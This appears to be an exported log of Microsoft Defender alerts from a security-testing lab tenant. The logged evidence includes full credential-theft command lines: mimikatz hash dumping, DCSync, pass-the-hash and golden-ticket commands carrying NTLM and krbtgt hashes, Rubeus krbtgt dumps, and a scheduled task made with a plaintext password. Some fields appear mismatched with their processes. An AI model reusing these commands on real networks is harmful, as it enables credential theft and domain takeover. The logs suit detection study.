"a1fddd460edd35ed449d32cc43bc15675c48a314a6fa5fb158e3bc4fea460be1", "url": null, "userPrincipalName": null, "userSid": null, "verdict": "Suspicious" }, { "aadUserId": null, "accountName": null, "detectionStatus": null, "deviceId": null, "domainName": null, "entityType": "Ip", "evidenceCreationTime": "2022-11-18T05:12:05.5433333Z", "fileName": null, "filePath": null, "ipAddress": "10.0.0.9", "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": null, "sha256": null, "url": null, "userPrincipalName": null, "userSid": null, "verdict": "Suspicious" }, { "aadUserId": "89b6fc86-af84-47b2-a72d-325362598b2c", "accountName": "ronhd", "detectionStatus": "Detected", "deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48", "domainName": "MSDXV2", "entityType": "Process", "evidenceCreationTime": "2022-11-18T05:12:05.5433333Z", "fileName": "Rubeus.exe", "filePath": "C:\\Temp", "ipAddress": null, "parentProcessCreationTime": "2022-11-18T05:10:14.9168031Z", "parentProcessFileName": "cmd.exe", "parentProcessFilePath": "C:\\Windows\\System32", "parentProcessId": 8784, "processCommandLine": "Rubeus.exe dump /service:krbtgt /user:steve ", "processCreationTime": "2022-11-18T05:10:14.9715084Z", "processId": 6712, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "Active", "remediationStatusDetails": null, "sha1": "fc870d086c53ded2e94300f7569aa9478186f2c7", "sha256": "a1fddd460edd35ed449d32cc43bc15675c48a314a6fa5fb158e3bc4fea460be1", "url": null, "userPrincipalName": "ronhd@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1111", "verdict": "Suspicious" }, { "aadUserId": null, "accountName": "SYSTEM", "detectionStatus": "Detected", "deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48", "domainName": "NT AUTHORITY", "entityType": "Process", "evidenceCreationTime": "2022-11-18T05:12:05.5433333Z", "fileName": "ntoskrnl.exe", "filePath": "C:\\Windows\\System32", "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": "2022-11-16T03:32:14.9719242Z", "processId": 4, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "Active", "remediationStatusDetails": null, "sha1": "f83368154fce0f4e8f9d6fe000ef522fbb3884b7", "sha256": "7e4a848626c99c715bd2c8686061420b8895e12ab8dfa0cce091f9df25750c13", "url": null, "userPrincipalName": null, "userSid": "S-1-5-18", "verdict": "Suspicious" }, { "aadUserId": "89b6fc86-af84-47b2-a72d-325362598b2c", "accountName": "ronhd", "detectionStatus": "Detected", "deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48", "domainName": "MSDXV2", "entityType": "Process", "evidenceCreationTime": "2022-11-18T05:16:46.7266667Z", "fileName": "Rubeus.exe", "filePath": "C:\\Temp", "ipAddress": null, "parentProcessCreationTime": "2022-11-18T05:14:15.5920711Z", "parentProcessFileName": "cmd.exe", "parentProcessFilePath": "C:\\Windows\\System32", "parentProcessId": 6600, "processCommandLine": "Rubeus.exe dump /service:krbtgt /user:steve ", "processCreationTime": "2022-11-18T05:14:15.6667374Z", "processId": 6644, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "fc870d086c53ded2e94300f7569aa9478186f2c7", "sha256": "a1fddd460edd35ed449d32cc43bc15675c48a314a6fa5fb158e3bc4fea460be1", "url": null, "userPrincipalName": "ronhd@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1111", "verdict": "Suspicious" } ]
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
Process
2022-11-18T05:12:05.5433333Z
Suspicious
Active
ronhd
MSDXV2
S-1-5-21-2300221942-1987151257-321556088-1111
89b6fc86-af84-47b2-a72d-325362598b2c
ronhd@msdxv2.m365dpoc.com
fc870d086c53ded2e94300f7569aa9478186f2c7
a1fddd460edd35ed449d32cc43bc15675c48a314a6fa5fb158e3bc4fea460be1
Rubeus.exe
C:\Temp
6,712
netstat -an
2022-11-18T05:10:14.9715084Z
8,784
2022-11-18T05:10:14.9168031Z
cmd.exe
C:\Windows\System32
Detected
36150b3c1b69b5c2da9df4efd86ac6c166924a48
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
Process
2022-09-30T06:16:01.7066667Z
Suspicious
Active
operator
NT AUTHORITY
S-1-5-18
null
null
16b6990ada0b0ccee28440afc00f9aa6bdc45f62
cc9b3a6c057ca31d0886c8efb7965a4c47e2d80fd0185d9b9fa55c5dc1d0dc55
ntoskrnl.exe
C:\Windows\System32
4
null
2022-09-15T03:19:28.401449Z
null
null
null
null
Detected
36150b3c1b69b5c2da9df4efd86ac6c166924a48
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-12-14T13:51:09.93Z
Malicious
None
darol
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1110
598763ac-48bb-4671-9472-6be219756e33
darol@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-11-21T02:04:55.1233333Z
Suspicious
None
jeff
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1104
e848b07a-87af-4448-9979-09f0b809c8d4
jeff@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-11-19T02:34:25.7533333Z
Suspicious
None
jeff
vpn.zone
S-1-5-21-2300221942-1987151257-321556088-1104
e848b07a-87af-4448-9979-09f0b809c8d4
jeff@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
Process
2022-12-22T09:30:37.3433333Z
Suspicious
None
root
MSDXV8
S-1-5-21-2159906967-4174806019-1002223092-1104
null
jeff@msdxv8.m365dpoc.com
ef95ff34f5eb7a36e4dba9d7957811caf738ef53
812ccfa2d234ef9989e1730976dd8217d0f3107fbd92244454a5fb735051b8db
schtasks.exe
C:\Windows\System32
6,868
"schtasks.exe" /CREATE /RU MSDXV8\RonHD /RP FightingTiger$ /SC DAILY /TN Execute-Notepad.536456477.2022-12-22_09_26_42 /TR C:\Windows\system32\notepad.exe /ST 00:00:00 /F
2022-12-22T09:26:42.0786601Z
5,408
2022-12-22T09:07:41.4690585Z
powershell_ise.exe
C:\Windows\System32\WindowsPowerShell\v1.0
Detected
7ba8aa008687dd62d639cb45b52c7c9f971c65c1
da638043439088663122_-145909142
20a5d017-0a2b-4f2a-a18c-7bdf6e4aac51
741
MicrosoftDefenderForEndpoint
2022-11-18T04:51:48.866329Z
2022-11-19T01:35:46.6533333Z
2022-11-19T01:35:46.5533333Z
2022-11-18T04:48:53.4831512Z
2022-11-18T04:48:53.4831512Z
Malicious credential theft tool execution detected
A known credential theft tool execution command line was detected. Either the process itself or its command line indicated an intent to dump users' credentials, keys, plain-text passwords and more.
CredentialAccess
Resolved
High
null
UnsupportedAlertType
TruePositive
SecurityTesting
WindowsDefenderAtp
f5d3c5d8-ec3a-4412-ab45-934d8faff42c
takeshi@msdxv2.m365dpoc.com
null
null
[ "T1003" ]
[ { "aadDeviceId": null, "defenderAvStatus": "NotSupported", "deviceDnsName": "staging.net", "firstSeen": "2022-10-10T06:18:04.255Z", "healthStatus": "Active", "loggedOnUsers": [ { "accountName": "Takeshi", "domainName": "TMTOWER-BOOK" } ], "mdatpDeviceId": "83b06aa80899050e5d4132992e36b5b8f14b64e9", "onboardingStatus": "Onboarded", "osBuild": 22621, "osPlatform": "Windows11", "osProcessor": "x64", "rbacGroupName": "UnassignedGroup", "riskScore": "None", "tags": [], "version": "22H2", "vmMetadata": null } ]
[ { "aadUserId": null, "accountName": "Takeshi", "detectionStatus": null, "deviceId": null, "domainName": "TMTOWER-BOOK", "entityType": "User", "evidenceCreationTime": "2022-11-18T04:51:48.8933333Z", "fileName": null, "filePath": null, "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": null, "sha256": null, "url": null, "userPrincipalName": null, "userSid": "S-1-5-21-7316772-2057538409-3008203053-1001", "verdict": "Suspicious" }, { "aadUserId": null, "accountName": "Takeshi", "detectionStatus": "Detected", "deviceId": "83b06aa80899050e5d4132992e36b5b8f14b64e9", "domainName": "TMTOWER-BOOK", "entityType": "Process", "evidenceCreationTime": "2022-11-18T04:51:48.8933333Z", "fileName": "mimikatz.exe", "filePath": "C:\\M365DAttack\\Mimikatz\\x64", "ipAddress": null, "parentProcessCreationTime": "2022-11-14T04:36:16.5242809Z", "parentProcessFileName": "powershell.exe", "parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "parentProcessId": 14616, "processCommandLine": "\"mimikatz.exe\" \"lsadump::dcsync /domain:WORKGROUP /user:krbtgt\" exit", "processCreationTime": "2022-11-18T04:48:53.4490025Z", "processId": 17772, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "Active", "remediationStatusDetails": null, "sha1": "70df765f554ed7392200422c18776b8992c09231", "sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9", "url": null, "userPrincipalName": null, "userSid": "S-1-5-21-7316772-2057538409-3008203053-1001", "verdict": "Suspicious" } ]
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-11-11T08:28:42.24Z
Suspicious
None
alice
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1104
e848b07a-87af-4448-9979-09f0b809c8d4
jeff@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-12-08T09:52:43.15Z
Suspicious
None
alice
null
S-1-12-1-2269820315-1261997569-3294602117-2733835123
874ab59b-8e01-4b38-85a3-5fc47303f3a2
msftadmin@msdx911571.onmicrosoft.com
null
null
null
null
null
null
null
null
null
null
null
null
null
da638072966347760708_134501400
901dd607-1ad3-4be3-b546-4ffd48e8a90f
975
MicrosoftDefenderForEndpoint
2022-12-22T09:03:54.7760895Z
2022-12-22T09:03:55.5666667Z
null
2022-12-22T08:47:34.3612687Z
2022-12-22T08:47:34.3612687Z
'Kekeo' malware was detected
Malware and unwanted software are undesirable applications that perform annoying, disruptive, or harmful actions on affected machines. Some of these undesirable applications can replicate and spread from one machine to another. Others are able to receive commands from remote attackers and perform activities associated with cyber attacks. This detection might indicate that the malware was stopped from delivering its payload. However, it is prudent to check the machine for signs of infection.
Malware
New
Informational
61
PendingApproval
null
null
WindowsDefenderAv
d60f5b90-ecd8-4d77-8186-a801597ec762
null
null
Kekeo
[]
[ { "aadDeviceId": null, "defenderAvStatus": "Updated", "deviceDnsName": "msdxv8-win10v.msdxv8.m365dpoc.com", "firstSeen": "2022-12-08T05:21:19.944Z", "healthStatus": "Inactive", "loggedOnUsers": [], "mdatpDeviceId": "7ba8aa008687dd62d639cb45b52c7c9f971c65c1", "onboardingStatus": "Onboarded", "osBuild": 17763, "osPlatform": "Windows10", "osProcessor": "x64", "rbacGroupName": "UnassignedGroup", "riskScore": "Low", "tags": [], "version": "1809", "vmMetadata": null } ]
[ { "aadUserId": null, "accountName": null, "detectionStatus": "Detected", "deviceId": "7ba8aa008687dd62d639cb45b52c7c9f971c65c1", "domainName": null, "entityType": "File", "evidenceCreationTime": "2022-12-22T09:03:54.8033333Z", "fileName": "Rubeus.exe", "filePath": "C:\\M365DAttack\\Rubeus", "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "fc870d086c53ded2e94300f7569aa9478186f2c7", "sha256": "a1fddd460edd35ed449d32cc43bc15675c48a314a6fa5fb158e3bc4fea460be1", "url": null, "userPrincipalName": null, "userSid": null, "verdict": "Suspicious" } ]
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-12-22T08:50:47.8466667Z
Suspicious
None
analyst
MSDXV8
S-1-5-21-2159906967-4174806019-1002223092-1104
null
jeff@msdxv8.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
Process
2022-09-30T06:14:54.5333333Z
Suspicious
Active
jeff
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1104
e848b07a-87af-4448-9979-09f0b809c8d4
jeff@msdxv2.m365dpoc.com
9a3be34e8316ebb945a4d5818a4066c91fe98c95
54daf167f8dbe7fe0f23b37a600bd8d9d16b756d3b83f0804b5037cbbe895eb6
nslookup.exe
C:\Windows\System32
7,544
type secret.txt
2022-09-30T06:11:51.7207947Z
10,824
2022-09-30T06:11:51.7062175Z
cmd.exe
C:\Windows\System32
Detected
c7e147cb0eb3534a4dcea5acb8e61c933713b145
da638037516302847098_-1773955767
48b744e2-d25c-40b8-afdb-e4cfc530cbc0
686
MicrosoftDefenderForEndpoint
2022-11-11T08:20:30.2847303Z
2022-11-12T01:35:43.1766667Z
2022-11-12T01:35:42.84Z
2022-11-11T08:16:44.6919693Z
2022-11-11T08:17:36.5981924Z
Suspicious User Account Discovery
A known tool or technique was used to gather information on this device. Attackers might be trying to gather information about the target device or network for later attacks.
Discovery
Resolved
Low
null
UnsupportedAlertType
TruePositive
SecurityTesting
WindowsDefenderAtp
9bfe28a9-21eb-4f8a-b51e-38ebd3650c88
takeshi@msdxv2.m365dpoc.com
null
null
[ "T1033", "T1087", "T1087.001" ]
[ { "aadDeviceId": null, "defenderAvStatus": "Updated", "deviceDnsName": "msdxv2-win10v.msdxv2.m365dpoc.com", "firstSeen": "2022-08-08T08:51:02.455Z", "healthStatus": "Active", "loggedOnUsers": [ { "accountName": "jeff", "domainName": "MSDXV2" } ], "mdatpDeviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "onboardingStatus": "Onboarded", "osBuild": 17763, "osPlatform": "Windows10", "osProcessor": "x64", "rbacGroupName": "Full Auto Clients", "riskScore": "None", "tags": [ "Full auto" ], "version": "1809", "vmMetadata": { "cloudProvider": "Unknown", "resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10V", "subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c", "vmId": "17881b39-b03f-4a2c-9b56-078be1330bd0" } } ]
[ { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": null, "deviceId": null, "domainName": "msdxv2.m365dpoc", "entityType": "User", "evidenceCreationTime": "2022-11-11T08:20:30.33Z", "fileName": null, "filePath": null, "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": null, "sha256": null, "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" } ]
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
Process
2022-12-22T09:30:44.15Z
Suspicious
None
bob
MSDXV8
S-1-5-21-2159906967-4174806019-1002223092-1104
null
jeff@msdxv8.m365dpoc.com
70df765f554ed7392200422c18776b8992c09231
912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9
mimikatz.exe
C:\M365DAttack\Mimikatz\x64
4,284
"mimikatz.exe" privilege::debug "kerberos::golden /domain:msdxv8.m365dpoc.com /sid:S-1-5-21-3093100532-1494214188-4059994775 /krbtgt:58c09f24a80803bb99a10fbe96570ebc /user:Defender /ticket:C:\M365DAttack\Admin-Tickets\ticket.kirbi /ptt" exit
2022-12-22T09:28:43.3962562Z
5,408
2022-12-22T09:07:41.4690585Z
powershell_ise.exe
\Device\HarddiskVolume4\Windows\System32\WindowsPowerShell\v1.0
Detected
7ba8aa008687dd62d639cb45b52c7c9f971c65c1
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-11-11T08:21:18.7533333Z
Suspicious
None
jeff
staging.net
S-1-5-21-2300221942-1987151257-321556088-1104
e848b07a-87af-4448-9979-09f0b809c8d4
jeff@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-12-14T15:03:42.41Z
Malicious
None
darol
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1110
598763ac-48bb-4671-9472-6be219756e33
darol@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
Process
2022-11-11T08:20:22.8833333Z
Suspicious
None
jeff
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1104
e848b07a-87af-4448-9979-09f0b809c8d4
jeff@msdxv2.m365dpoc.com
6cbce4a295c163791b60fc23d285e6d84f28ee4c
de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c
powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0
4,704
dir C:\
2022-11-11T08:16:44.2952776Z
4,680
2022-11-10T07:07:26.0872385Z
explorer.exe
C:\Windows
Detected
c7e147cb0eb3534a4dcea5acb8e61c933713b145
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-12-14T14:23:29.45Z
Suspicious
None
darol
malicious.io
S-1-5-21-2300221942-1987151257-321556088-1110
598763ac-48bb-4671-9472-6be219756e33
darol@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
Process
2022-11-18T05:10:52.3466667Z
Suspicious
None
jeff
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1104
e848b07a-87af-4448-9979-09f0b809c8d4
jeff@msdxv2.m365dpoc.com
70df765f554ed7392200422c18776b8992c09231
912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9
mimikatz.exe
C:\M365DAttack\Mimikatz\x64
9,728
curl http://malicious
2022-11-18T05:09:59.3725807Z
4,976
2022-11-18T05:04:12.7150402Z
powershell.exe
\Device\HarddiskVolume4\Windows\System32\WindowsPowerShell\v1.0
Detected
c7e147cb0eb3534a4dcea5acb8e61c933713b145
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
Process
2022-09-30T06:14:46.2833333Z
Malicious
None
jeff
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1104
e848b07a-87af-4448-9979-09f0b809c8d4
jeff@msdxv2.m365dpoc.com
70df765f554ed7392200422c18776b8992c09231
912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9
mimikatz.exe
C:\M365DAttack\Mimikatz\x64
7,288
"mimikatz.exe" privilege::debug "sekurlsa::pth /user:ronhd /ntlm:96def1a633fc6790124d5f8fe21cc72b /domain:msdxv2.m365dpoc.com /run:\"powershell.exe C:\M365DAttack\Get-KRBTicket.ps1\"" exit -Wait
2022-09-30T06:11:59.3259132Z
4,064
2022-09-30T06:11:13.210308Z
powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0
Detected
c7e147cb0eb3534a4dcea5acb8e61c933713b145
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
Process
2022-11-21T02:03:40.3033333Z
Suspicious
None
hacker
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1104
e848b07a-87af-4448-9979-09f0b809c8d4
jeff@msdxv2.m365dpoc.com
70df765f554ed7392200422c18776b8992c09231
912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9
mimikatz.exe
C:\M365DAttack\Mimikatz\x64
7,452
"mimikatz.exe" privilege::debug "sekurlsa::pth /user:ronhd /ntlm:96def1a633fc6790124d5f8fe21cc72b /domain:msdxv2.m365dpoc.com /run:\"powershell.exe C:\M365DAttack\Get-KRBTicket.ps1\"" exit -Wait
2022-11-21T02:01:44.2419747Z
11,068
2022-11-21T02:01:28.4753286Z
powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0
Detected
c7e147cb0eb3534a4dcea5acb8e61c933713b145
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-09-30T05:36:53.11Z
Suspicious
None
hacker
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1108
324fbd9c-a6de-4e8c-ab3b-ede964d3f3ce
alex@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-11-28T09:51:39.7666667Z
Suspicious
None
darol
evilcorp.cn
S-1-5-21-2300221942-1987151257-321556088-1110
598763ac-48bb-4671-9472-6be219756e33
darol@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
Process
2022-11-18T04:44:39.08Z
Suspicious
Active
operator
TMTOWER-BOOK
S-1-5-21-7316772-2057538409-3008203053-1001
null
null
76866dde54ee3fa5bc8efefb9d44e6bf859973aa
afbe51517092256504f797f6a5abc02515a09d603e8c046ae31d7d7855568e91
net.exe
C:\Windows\System32
17,344
"net.exe" user /domain
2022-11-18T04:38:44.7323003Z
14,616
2022-11-14T04:36:16.5242809Z
powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0
Detected
83b06aa80899050e5d4132992e36b5b8f14b64e9
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-11-11T08:21:09.1466667Z
Suspicious
None
jeff
staging.net
S-1-5-21-2300221942-1987151257-321556088-1104
e848b07a-87af-4448-9979-09f0b809c8d4
jeff@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
da638037518549951922_-2044684283
e46fcd28-d937-4252-b10a-91c5292c21d0
686
MicrosoftDefenderForEndpoint
2022-11-11T08:24:14.995216Z
2022-11-12T01:35:43.1766667Z
2022-11-12T01:35:42.84Z
2022-11-11T08:21:30.0941332Z
2022-11-11T08:21:30.0941332Z
Password hashes dumped from LSASS memory
LSASS process memory has been read to obtain password hashes, indicating possible credential theft. Attackers can use hashes obtained from LSASS process memory to impersonate or perform actions on behalf of logged on or recently logged on users.
CredentialAccess
Resolved
Medium
null
UnsupportedAlertType
TruePositive
SecurityTesting
WindowsDefenderAtp
2ed33edd-2c33-49fd-877b-ab73fba14d59
takeshi@msdxv2.m365dpoc.com
null
null
[ "T1003", "T1003.001" ]
[ { "aadDeviceId": null, "defenderAvStatus": "Updated", "deviceDnsName": "msdxv2-win10v.msdxv2.m365dpoc.com", "firstSeen": "2022-08-08T08:51:02.455Z", "healthStatus": "Active", "loggedOnUsers": [ { "accountName": "jeff", "domainName": "MSDXV2" } ], "mdatpDeviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "onboardingStatus": "Onboarded", "osBuild": 17763, "osPlatform": "Windows10", "osProcessor": "x64", "rbacGroupName": "Full Auto Clients", "riskScore": "High", "tags": [ "Full auto" ], "version": "1809", "vmMetadata": { "cloudProvider": "Unknown", "resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10V", "subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c", "vmId": "17881b39-b03f-4a2c-9b56-078be1330bd0" } } ]
[ { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": null, "deviceId": null, "domainName": "msdxv2.m365dpoc", "entityType": "User", "evidenceCreationTime": "2022-11-11T08:24:15.04Z", "fileName": null, "filePath": null, "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": null, "sha256": null, "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-11T08:24:15.04Z", "fileName": "mimikatz.exe", "filePath": "C:\\M365DAttack\\Mimikatz\\x64", "ipAddress": null, "parentProcessCreationTime": "2022-11-11T08:16:44.2952776Z", "parentProcessFileName": "powershell.exe", "parentProcessFilePath": "\\Device\\HarddiskVolume4\\Windows\\System32\\WindowsPowerShell\\v1.0", "parentProcessId": 4704, "processCommandLine": "\"mimikatz.exe\" privilege::debug sekurlsa::logonpasswords exit", "processCreationTime": "2022-11-11T08:17:06.3382251Z", "processId": 6044, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "70df765f554ed7392200422c18776b8992c09231", "sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": null, "accountName": "SYSTEM", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "NT AUTHORITY", "entityType": "Process", "evidenceCreationTime": "2022-11-11T08:24:15.04Z", "fileName": "lsass.exe", "filePath": "C:\\Windows\\System32", "ipAddress": null, "parentProcessCreationTime": "2022-11-10T07:06:09.0096674Z", "parentProcessFileName": "wininit.exe", "parentProcessFilePath": "\\Device\\HarddiskVolume4\\Windows\\System32", "parentProcessId": 532, "processCommandLine": "lsass.exe", "processCreationTime": "2022-11-10T07:06:09.0866649Z", "processId": 624, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "Active", "remediationStatusDetails": null, "sha1": "0fb26350106c9bdd196d4e7d01eb30007663687c", "sha256": "bbc83e4759d4b82bad31e371ad679aa414c72273bf97cee5aed8337ed8a4d79f", "url": null, "userPrincipalName": null, "userSid": "S-1-5-18", "verdict": "Suspicious" } ]
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
Process
2022-11-11T08:19:56.9633333Z
Unknown
None
SYSTEM
NT AUTHORITY
S-1-5-18
null
null
f309b61a8b005b5ce0a3fb58caaa798cfc95f5db
3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748
PSEXESVC.exe
C:\Windows
268
PSEXESVC.exe
2022-11-11T08:17:57.8297749Z
680
2022-11-10T17:17:06.0160973Z
services.exe
C:\Windows\System32
Detected
e138ecd8e7b21eaf952cb35d56349bf50c64ac96
da638037515968048904_2062696340
7699ae3b-e99f-48d4-aeba-77f1eb5fa9de
686
MicrosoftDefenderForEndpoint
2022-11-11T08:19:56.8049323Z
2022-11-12T01:35:42.87Z
2022-11-11T08:28:42.4277612Z
2022-11-11T08:17:36.7892749Z
2022-11-11T08:17:58.1670825Z
File dropped and launched from remote location
A remote session dropped a file and executed it. An attacker or a malware might be an attempting move laterally or propagate.
LateralMovement
Resolved
Medium
40
Benign
TruePositive
SecurityTesting
WindowsDefenderAtp
17d50613-c135-4981-858e-86cdecb4e46e
msftadmin@msdxv2.m365dpoc.com
null
null
